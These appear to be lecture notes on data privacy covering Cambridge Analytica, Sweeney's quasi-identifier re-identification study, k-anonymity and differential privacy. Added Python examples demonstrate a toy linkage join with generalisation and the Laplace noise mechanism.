Through those users' friend lists, it obtained data from up to 87 million users. The data was handed to the political consulting firm Cambridge Analytica to build profiles of individual voters and their political preferences, to best target advertising and sway voter sentiment.
According to the Cambridge Analytica whistleblower, this data helped to sway the presidential election.
IDENTIFYING YOU IN CENSUS DATA

In 1997, a health insurance organization in Massachusetts released hospital visit records with the names removed; ZIP code, date of birth, and gender were retained for research purposes.
Researcher Sweeney bought the public voter records from Massachusetts, which had both full identifiers (names, addresses) and demographic data (ZIP code and date of birth).
Linking the two identified the medical record of the Governor!
87% of the population in the U.S. can be uniquely identified based on ZIP code, date of birth, and gender, according to the Census summary data of 1991.
Attributes like these, which can potentially be linked with external information to re-identify entities, are called quasi-identifiers.

Source: P. Samarati, L. Sweeney. "Protecting privacy when disclosing information: k-anonymity and its enforcement through generalization and suppression".
EXAMPLE

Hospital Patient Data (names removed)            Vote Registration Data (public)

DOB      Sex     Zipcode  Disease                 Name   DOB      Sex     Zipcode
1/21/76  Male    53715    Heart Disease           Andre  1/21/76  Male    53715
4/13/86  Female  53715    Hepatitis               Beth   1/10/81  Female  55410
2/28/76  Male    53703    Bronchitis              Carol  10/1/44  Female  90210
1/21/76  Male    53703    Broken Arm              Dan    2/21/84  Male    02174
4/13/86  Female  53706    Flu                     Ellen  4/19/72  Female  02237
2/28/76  Female  53706    Hang Nail

Andre (1/21/76, Male, 53715) matches exactly one hospital row: Andre has heart disease!
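An added Python example (written for this page, not from the lecture) that performs the linking attack above on the two tables from the slide, then shows k-anonymity by generalisation: keeping only the birth year and the first three ZIP digits, and then also suppressing sex, until every released row shares its quasi-identifier with at least k others. The tables are transcribed from the slide; the generalisation levels are an assumption.

```python
from collections import Counter, defaultdict

# The two tables from the slide (transcribed; the hospital table has names removed).
HOSPITAL = [  # (DOB, Sex, Zip, Disease)
    ("1/21/76", "Male",   "53715", "Heart Disease"),
    ("4/13/86", "Female", "53715", "Hepatitis"),
    ("2/28/76", "Male",   "53703", "Bronchitis"),
    ("1/21/76", "Male",   "53703", "Broken Arm"),
    ("4/13/86", "Female", "53706", "Flu"),
    ("2/28/76", "Female", "53706", "Hang Nail"),
]
VOTERS = [  # (Name, DOB, Sex, Zip) -- public record
    ("Andre", "1/21/76", "Male",   "53715"),
    ("Beth",  "1/10/81", "Female", "55410"),
    ("Carol", "10/1/44", "Female", "90210"),
    ("Dan",   "2/21/84", "Male",   "02174"),
    ("Ellen", "4/19/72", "Female", "02237"),
]

def exact(dob, sex, zipc):
    """Quasi-identifier as released on the slide: full DOB, sex and 5-digit ZIP."""
    return (dob, sex, zipc)

def generalise(dob, sex, zipc, level=1):
    """Generalisation: level 1 keeps birth year, sex and the first 3 ZIP digits;
    level 2 suppresses sex as well."""
    year = dob.split("/")[-1]
    return (year, sex if level == 1 else "*", zipc[:3] + "**")

def link(hospital, voters, key=exact):
    """Join the two tables on the quasi-identifier returned by `key`.
    Result: name -> set of candidate diseases; a single candidate is a re-identification."""
    index = defaultdict(set)
    for dob, sex, zipc, disease in hospital:
        index[key(dob, sex, zipc)].add(disease)
    return {name: index[key(dob, sex, zipc)]
            for name, dob, sex, zipc in voters if key(dob, sex, zipc) in index}

def k_of(hospital, key=exact):
    """The k of a release: size of the smallest group of rows sharing a quasi-identifier.
    k = 1 means at least one person is unique in the release and therefore linkable."""
    return min(Counter(key(dob, sex, zipc) for dob, sex, zipc, _ in hospital).values())

if __name__ == "__main__":
    print(link(HOSPITAL, VOTERS), k_of(HOSPITAL))
    print(link(HOSPITAL, VOTERS, generalise), k_of(HOSPITAL, generalise))
```

Note that the first generalisation alone still leaves k = 1: the single female born in 1976 in 537** remains unique, so her row must be generalised further (here by suppressing sex) or dropped before the table is 2-anonymous. Checking k on the release, not just on the rows one happens to look at, is the whole point.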
DIFFERENTIAL PRIVACY

Differential Privacy: a person's privacy cannot be compromised by a statistical release if their data are not in the database; the goal is to give everyone roughly the same privacy that would result from having their data removed.
Add noise to the query answer.
The noise should ensure that the probability we receive an answer when a user is in the data, and the probability we receive the same answer when the user is not in the data, are almost the same.
The privacy level is a parameter that defines how close these two probabilities should be.
Usage:
2015: Google, for sharing historical traffic statistics.
2016: Apple announced its intention to use differential privacy in iOS 10 to improve its intelligent personal assistant technology.
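An added Python example (written for this page, not from the lecture) of the Laplace mechanism, the standard way to "add noise to the query answer" for a counting query: with the user's record present the true count is 10, without it 9 (constructed values), and the code checks the promise stated above, that the likelihood ratio of any released answer between those two cases never exceeds exp(epsilon), where epsilon is the privacy parameter.

```python
import math
import random

def laplace_pdf(x, scale):
    return math.exp(-abs(x) / scale) / (2 * scale)

def laplace_sample(scale, rng=random):
    """Inverse-CDF sampling of Laplace(0, scale)."""
    u = rng.random() - 0.5
    return -scale * math.copysign(1.0, u) * math.log(max(1 - 2 * abs(u), 1e-300))

def noisy_count(true_count, epsilon, rng=random):
    """Laplace mechanism for a counting query. One person changes a count by at most 1
    (sensitivity 1), so noise of scale 1/epsilon gives epsilon-differential privacy."""
    return true_count + laplace_sample(1.0 / epsilon, rng)

def privacy_ratio(answer, count_with, count_without, epsilon):
    """Likelihood of releasing `answer` with the user in the data vs. without.
    Differential privacy promises this ratio never exceeds exp(epsilon), for ANY answer."""
    scale = 1.0 / epsilon
    return laplace_pdf(answer - count_with, scale) / laplace_pdf(answer - count_without, scale)

def worst_case_ratio(count_with, count_without, epsilon, answers):
    return max(privacy_ratio(a, count_with, count_without, epsilon) for a in answers)

# Constructed query: "how many customers rented movie X", evaluated with and without Bob.
COUNT_WITH_BOB, COUNT_WITHOUT_BOB = 10, 9

def demo(epsilon=0.5, seed=7):
    rng = random.Random(seed)
    return {
        "exact_leaks": COUNT_WITH_BOB != COUNT_WITHOUT_BOB,   # exact answers reveal membership
        "noisy_with": noisy_count(COUNT_WITH_BOB, epsilon, rng),
        "noisy_without": noisy_count(COUNT_WITHOUT_BOB, epsilon, rng),
        "bound": math.exp(epsilon),
        "worst_ratio": worst_case_ratio(COUNT_WITH_BOB, COUNT_WITHOUT_BOB, epsilon,
                                        [x / 10 for x in range(-100, 300)]),
    }
```

A smaller epsilon means a tighter bound and therefore more noise; the exact count, which is the epsilon = infinity case, always distinguishes the two databases because 10 and 9 cannot both be released from the same data.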
E-COMMERCE SECURITY: SUMMARY

(Figure: the attack scenario again, now with Privacy added. Attacks: Attack software, Trick shopper, Hack mobile phone, Attack server, Snoop network. Areas: Client-side Security, Communication Security, Server-side Security, plus Data Privacy.)